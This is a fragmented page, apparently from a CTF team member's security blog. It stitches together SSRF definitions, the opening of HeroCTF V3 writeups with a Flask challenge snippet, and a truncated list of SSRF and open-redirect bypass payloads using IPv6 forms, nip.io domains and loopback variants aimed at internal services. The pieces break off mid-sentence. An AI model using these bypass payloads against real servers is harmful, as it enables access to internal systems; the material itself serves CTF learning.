Whoami ┌─[koimet@parrot]─[~] └──╼ $whoami koimet - captain fr334aks SSRF What is SSRF a web security vulnerability that allows an attacker to induce the server-side application to make HTTP requests to an arbitrary domain of the attacker’s choosing. ~portswigger
a Web security that lets attackers send requests from the server to other resources, both internal and external, and receive responses. ~acunetix
Why SSRF Despite being old in the field it’s still a less known vulnerability
Howdy, we recently took part in HeroCTF V3 and we settled for #68 from 645 teams here are some of my writeups
Forensics We need you 1/5 Category Forensics Description Interpol and the FBI have been investigating for over a year now. They are trying to get their hands on two hackers very well known for their ransomware and their ultra efficient botnet.
After long months of investigation, they managed to get their hands on one of their servers.
Challenge Solution we are also given the source file here
which had the following
and the challenge
the two python scripts as follows
from flask import Flask, request, render_template from urllib.parse import unquote from bot import visit_report app = Flask(__name__) @app.route("/") def index(): return render_template("index.html") @app.route("/api/submit", methods=["POST"]) def submit(): try: url = request.json.get("url") assert(url.startswith('http://') or url.startswith('https://')) visit_report(url) return {"success": 1, "message": "Thank you for your valuable submition!"} except: return {"failure": 1, "message": "Something went wrong.
SSRF Hello there,below is a list of most common SSRF payloads and open-redirect bypasses
SSRF & Open Redirect Bypass With [::], abuses IPV6 http://[::]/
http://[::]:80/
http://[::]:25/ SMTP
http://[::]:22/ SSH
http://[::]:3128/ Squid
http://0000::1/
http://0000::1:80/
http://0000::1:25/ SMTP
http://0000::1:22/ SSH
http://0000::1:3128/Squid
With domain redirection, useful when all IP addresses are blacklisted http://localtest.me
http://test.app.127.0.0.1.nip.io
http://test-app-127-0-0-1.nip.io
httP://test.app.127.0.0.1.xip.io
With CIDR, useful when just 127.0.0.1 is whitelisted http://127.127.127.127/
http://127.0.1.3/
https:/127.0.0.0/
With IPv6/IPv4 address embedding, useful when both IPv4 and IPv6 are blacklisted (but blacklisted badly) http://[0:0:0:0:0:ffff:127.